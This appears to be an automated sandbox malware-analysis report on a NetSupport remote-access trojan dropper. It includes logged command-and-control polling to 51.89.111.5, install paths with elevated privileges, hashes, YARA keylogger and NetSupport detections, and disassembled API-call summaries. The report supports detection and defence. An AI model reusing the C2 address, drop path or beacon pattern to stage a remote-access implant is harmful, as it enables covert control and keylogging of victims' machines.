Nov 1, 2024 18:14:45.022902012 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.121438026 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.222671032 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.322478056 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.422523022 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.526509047 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.624412060 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.728343964 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.824934959 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:45.925430059 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:46.025465012 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:46.125489950 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:46.326520920 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:46.686445951 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:46.786423922 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:46.886471033 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:46.988358974 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.088463068 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.189429045 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.290441990 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.389476061 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.490432978 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.504559994 CET	603	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.590512037 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.691437006 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.793597937 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:14:47.808433056 CET	1206	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.1 [TRUNCATED] Data Raw: Data Ascii:

Target ID:	0
Start time:	13:11:00
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\hkpqXovZtS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hkpqXovZtS.exe"
Imagebase:	0x400000
File size:	3'338'375 bytes
MD5 hash:	885A317F0E6471B48210A165FA878AF7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:11:03
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
Imagebase:	0x650000
File size:	106'864 bytes
MD5 hash:	F76954B68CC390F8009F1A052283A740
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3709073509.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3710467122.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000003.1569570475.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, Author: Joe Security
Antivirus matches:	Detection: 30%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	13:11:14
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
Imagebase:	0x650000
File size:	106'864 bytes
MD5 hash:	F76954B68CC390F8009F1A052283A740
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	14.7%
Signature Coverage:	6.3%
Total number of Nodes:	1451
Total number of Limit Nodes:	65

Executed Functions

Function 02291C53 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 124
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 02291C7C
GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C7F
GetCurrentThread.KERNEL32 ref: 02291C8B
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C8E
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C94
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C9D
Thread32First.KERNEL32(00000000,?), ref: 02291CC7
GetCurrentProcessId.KERNEL32 ref: 02291CD5
GetCurrentThreadId.KERNEL32 ref: 02291CE1
Thread32Next.KERNEL32(00000000,0000001C), ref: 02291CFC
Thread32First.KERNEL32(00000000,0000001C), ref: 02291D3E
GetCurrentProcessId.KERNEL32 ref: 02291D50
GetCurrentThreadId.KERNEL32 ref: 02291D5C
Thread32Next.KERNEL32(00000000,0000001C), ref: 02291D97
CloseHandle.KERNEL32(00000000), ref: 02291DB1
GetCurrentThread.KERNEL32 ref: 02291DBC
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291DBF

Strings

kL, xrefs: 02291C56

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: CurrentThread$Thread32$PriorityProcess$FirstNext$CloseCreateHandleSnapshotToolhelp32
String ID: kL
API String ID: 2145368864-2496334608
Opcode ID: 4dab244311c8a4d79d79bfe3cbe15cdeb414b050d9d7db6311c10b9c5f1ef8d4
Instruction ID: 36a96b6760b0ba38d7c3f8fc475d35a9bfa26aecd44c0bdb4900a0013b6ab81d
Opcode Fuzzy Hash: 4dab244311c8a4d79d79bfe3cbe15cdeb414b050d9d7db6311c10b9c5f1ef8d4
Instruction Fuzzy Hash: 47416A719543029FDB10EFE6E848A2ABBB8EF88795F044D29F995C2144E730C925DB62

Function 0040FBD4 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410AD1: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410AE6

Part of subcall function 00411624: GetCPInfo.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00411635

_memset.LIBCMT ref: 0040FC04
CloseHandle.KERNEL32(?,00000004,00000000,winrarsfxmappingfile.tmp), ref: 0040FC72
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,0040F34C,00000000), ref: 0040FD30
DeleteObject.GDI32 ref: 0040FD91
DeleteObject.GDI32(?), ref: 0040FD9D

Strings

STARTDLG, xrefs: 0040FD22
lB, xrefs: 0040FDB4
sfxcmd, xrefs: 0040FC5B, 0040FC7D
winrarsfxmappingfile.tmp, xrefs: 0040FC27
xB, xrefs: 0040FCE5
sfxname, xrefs: 0040FC9B

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: DeleteObject$AddressCloseDialogHandleInfoParamProc_memset
String ID: STARTDLG$lB$sfxcmd$sfxname$winrarsfxmappingfile.tmp$xB
API String ID: 1958261340-3440985015
Opcode ID: 63d67b826d98dcd49d227b18b0a4d81c0078cb04adbf65ed0c8ee994f698998d
Instruction ID: a539fbd58235541fe969ffb0acdfd90942c83428e348c821cb19171fb0839507
Opcode Fuzzy Hash: 63d67b826d98dcd49d227b18b0a4d81c0078cb04adbf65ed0c8ee994f698998d
Instruction Fuzzy Hash: A45195B0A41215EAD720FBB2AC86E9E7A69EF41708B50143FF501B32D2DA7C5945CB1D

Function 022911EE Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 267
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 022918A1: RtlEnterCriticalSection.NTDLL(022E4024), ref: 022918AB
Part of subcall function 022918A1: RtlLeaveCriticalSection.NTDLL(022E4024), ref: 022918E0

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 022913D3
__allrem.LIBCMT ref: 02291469
__allrem.LIBCMT ref: 02291491
NtSetInformationFile.NTDLL(?,?,?,00000008,0000000E), ref: 0229155C

Strings

0L{, xrefs: 022914F6, 022914FD
kL, xrefs: 022911F1

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: CriticalFileSection__allrem$EnterInformationLeaveRead
String ID: 0L{$kL
API String ID: 3056675614-2482176762
Opcode ID: 0d1d881a45d6545452623fa6c0eba49551a098732ccfcf98f998de2206135554
Instruction ID: 25e3d83f9c250a3e930a26916bd94b67ed21aa093ed87c37e3f2e804aaa1abb8
Opcode Fuzzy Hash: 0d1d881a45d6545452623fa6c0eba49551a098732ccfcf98f998de2206135554
Instruction Fuzzy Hash: 30B18771A58342DFCB10CFA9D884A6ABBF1BBC9304F04491DF99997348D770E864CB86

Function 004093B9 Relevance: 6.1, APIs: 4, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004093E7

Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E

FindFirstFileW.KERNEL32(?,?,?,?,00000800), ref: 00409417
GetLastError.KERNEL32(?,?,00000800), ref: 00409421
GetLastError.KERNEL32(000000FF,?), ref: 00409459

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorFileFindFirstLast$_wcscpy_wcslen_wcsncpy
String ID:
API String ID: 208496615-0
Opcode ID: cebcceb43910dc4115f7d404cdd30f868bf379ffd75f27eb529d56c97cebf74b
Instruction ID: 4aa6cb4bef7fcbfd161077f23712da366d19d4f9968ffeb5f4cd169760b85fcb
Opcode Fuzzy Hash: cebcceb43910dc4115f7d404cdd30f868bf379ffd75f27eb529d56c97cebf74b
Instruction Fuzzy Hash: DA415F71500658ABCB30DF28CC84BDAB7F8AF08350F1045AAF5AEE6291D774AEC1CB54

Function 02291DE2 Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E2D
VirtualQuery.KERNEL32(?,?,0000001C,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E55
VirtualAlloc.KERNEL32(?,0000006C,00003000,00000020), ref: 02291E90

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Virtual$AllocInfoQuerySystem
String ID:
API String ID: 823228801-0
Opcode ID: 53091006a363010ef4c0ce2d728dd050c796fe6f75e8149d841c03ca84b2b03c
Instruction ID: 51e679f85a04b0bd1ba94b2293fea9053b7233d255ebbc53cf993fd7eb13b77e
Opcode Fuzzy Hash: 53091006a363010ef4c0ce2d728dd050c796fe6f75e8149d841c03ca84b2b03c
Instruction Fuzzy Hash: 5321F732A543068FEB05DEE6D88875AB3EEAB88304F110C3DE58AC7184D7F5D869C701

Function 004D0FDC Relevance: 3.0, APIs: 2, Instructions: 33nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00001000,00000004), ref: 004D1009
NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 004D102F

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: e7b345b912f126f178e2541447047507b5197e83b236eb501eecb7dba1514627
Instruction ID: 4ccaec625d17c4f065e5932546898ee997b503673f8cd146e4b71856a3390186
Opcode Fuzzy Hash: e7b345b912f126f178e2541447047507b5197e83b236eb501eecb7dba1514627
Instruction Fuzzy Hash: 35F0FF75940248FBDB10DF94C859BED77B4EB04760F208295E920A62D0D7B46A84CB95

Function 004173EF Relevance: 2.6, APIs: 1, Instructions: 1053COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041742C

Part of subcall function 0041720E: __EH_prolog.LIBCMT ref: 00417213

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog_memset
String ID:
API String ID: 1619290041-0
Opcode ID: 79dd8a3aeb653383c2a714cbb444127f8573c188ea481f85f5fc91de35f7538f
Instruction ID: 3eb4abe1162c79405747c8457d9548ee8fc3b97d27ef5f476af8528d47a403d6
Opcode Fuzzy Hash: 79dd8a3aeb653383c2a714cbb444127f8573c188ea481f85f5fc91de35f7538f
Instruction Fuzzy Hash: D592C370A087859FCB29CF34C4D06E9BBF1AF55308B18C49ED8968B352D738E985CB59

Function 0045467A Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b0376bbcdfdaaf0b5895f3f32c5749065beb5c8c17e5f97fff5aacc2fd95cf
Instruction ID: 406a576274826a1d078d48897a2511a6fd14e8948a0ea3d968b390d4a4adaa8c
Opcode Fuzzy Hash: e6b0376bbcdfdaaf0b5895f3f32c5749065beb5c8c17e5f97fff5aacc2fd95cf
Instruction Fuzzy Hash: 3331C632908219AFCB22DF58C94169EB3E5BF80704F54881FE599D7302E738AD199B87

Function 0229110B Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0229113E

Part of subcall function 02291908: RtlEnterCriticalSection.NTDLL(022E4024), ref: 02291911
Part of subcall function 02291908: RtlLeaveCriticalSection.NTDLL(022E4024), ref: 0229195F

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: CriticalSection$CreateEnterFileLeave
String ID:
API String ID: 2623862156-0
Opcode ID: 5ded528eb0fdd7aa0fafbd9923a4ac878af61844773285ed85887521e808fea4
Instruction ID: d2b998cac163796f871534ed9eb69bc63b84f7fa9a2cd3179e563d65bb15a176
Opcode Fuzzy Hash: 5ded528eb0fdd7aa0fafbd9923a4ac878af61844773285ed85887521e808fea4
Instruction Fuzzy Hash: A7F01D36109305BF9B015E86EC40D5BBBBAEFC93A5F50482EFA9442220C773E921DF21

Function 004D103C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

